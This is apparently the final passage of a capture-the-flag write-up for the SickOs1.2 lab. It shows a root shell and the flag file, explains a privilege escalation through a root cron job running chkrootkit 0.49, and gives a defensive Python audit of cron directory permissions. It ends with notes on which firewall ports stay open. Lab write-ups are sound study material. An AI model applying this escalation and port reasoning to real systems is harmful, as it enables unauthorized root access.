    bash: no job control in this shell
    root@ubuntu:~# whoami
    whoami
    root
    root@ubuntu:~# cd ~
    cd ~
    root@ubuntu:~# ls
    ls
    304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
    7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    chkrootkit-0.49
    newRule
    root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
    WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

    Thanks for giving this try.

    @vulnhub: Thanks for hosting this UP!.
    root@ubuntu:~#
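The escalation works because a script root runs from /etc/cron.daily (through run-parts, as the author found) honours a file that an unprivileged user wrote. The cron directory itself is the place to audit: run-parts executes every executable regular file at the first level whose name contains only ASCII letters, digits, underscores and hyphens, so anything there that a non-root user can edit runs as root on schedule. The following Python is an added example, not code from the original post: it reproduces that selection rule, flags entries that are not root-owned or are group/world-writable, and builds a constructed stand-in directory in a temp location so it runs offline. The entry names in the sample directory are mine. It checks ownership and permission bits only; a flaw inside a correctly owned script, as with chkrootkit 0.49 here, is caught by keeping packages current, not by this audit.

```python
import os
import re
import stat
import tempfile

# Debian run-parts (default mode) runs only executable regular files whose names
# consist solely of ASCII letters, digits, '_' and '-'; "backup.sh" is skipped.
RUN_PARTS_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def run_parts_candidates(dirpath: str) -> list:
    """Files run-parts would execute from dirpath, in lexical order."""
    picked = []
    for name in sorted(os.listdir(dirpath)):
        st = os.stat(os.path.join(dirpath, name))   # follows symlinks, as run-parts does
        if not RUN_PARTS_NAME.match(name) or not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            picked.append(name)
    return picked


def audit_cron_dir(dirpath: str, expected_uid: int = 0) -> list:
    """Flag scripts that run-parts would run but a non-owner could alter.
    Returns (name, problem) pairs; expected_uid is 0 on a real system."""
    findings = []
    for name in run_parts_candidates(dirpath):
        st = os.stat(os.path.join(dirpath, name))
        if st.st_uid != expected_uid:
            findings.append((name, f"owned by uid {st.st_uid}, not {expected_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    return findings


def build_sample_dir() -> str:
    """CONSTRUCTED stand-in for /etc/cron.daily so the audit runs offline."""
    d = tempfile.mkdtemp(prefix="cron.daily-")
    spec = {
        ".placeholder": 0o644,   # dot in name and not executable: skipped
        "apt": 0o755,            # ordinary entry
        "chkrootkit": 0o755,     # ordinary entry (content is not inspected)
        "backup.sh": 0o755,      # executable, but the dot means run-parts skips it
        "cleanup": 0o777,        # executable and writable by anyone: finding
    }
    for name, mode in spec.items():
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)          # chmod is not subject to umask
    return d


def audit_sample():
    """Audit the constructed directory against the current user, since the
    demo cannot create root-owned files; on a real host pass expected_uid=0."""
    d = build_sample_dir()
    return run_parts_candidates(d), audit_cron_dir(d, expected_uid=os.getuid())


if __name__ == "__main__":
    candidates, findings = audit_sample()
    print("run-parts would execute:", candidates)
    for name, problem in findings:
        print(f"FINDING: {name}: {problem}")
```

On a real host run `audit_cron_dir("/etc/cron.daily")` (and the hourly/weekly/monthly siblings) as-is; the rule that a dotted name is silently skipped also explains why leftover `something.dpkg-old` files in those directories never run, and why a script renamed without an extension suddenly does.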

There's also a newRule in the directory; taking another look won't hurt.
Case closed: indeed only 8080, 443, 22 and 80 are not filtered.
Why did 8080 and 443 come to mind right away?
Because, to keep web services working, these two ports are usually not filtered.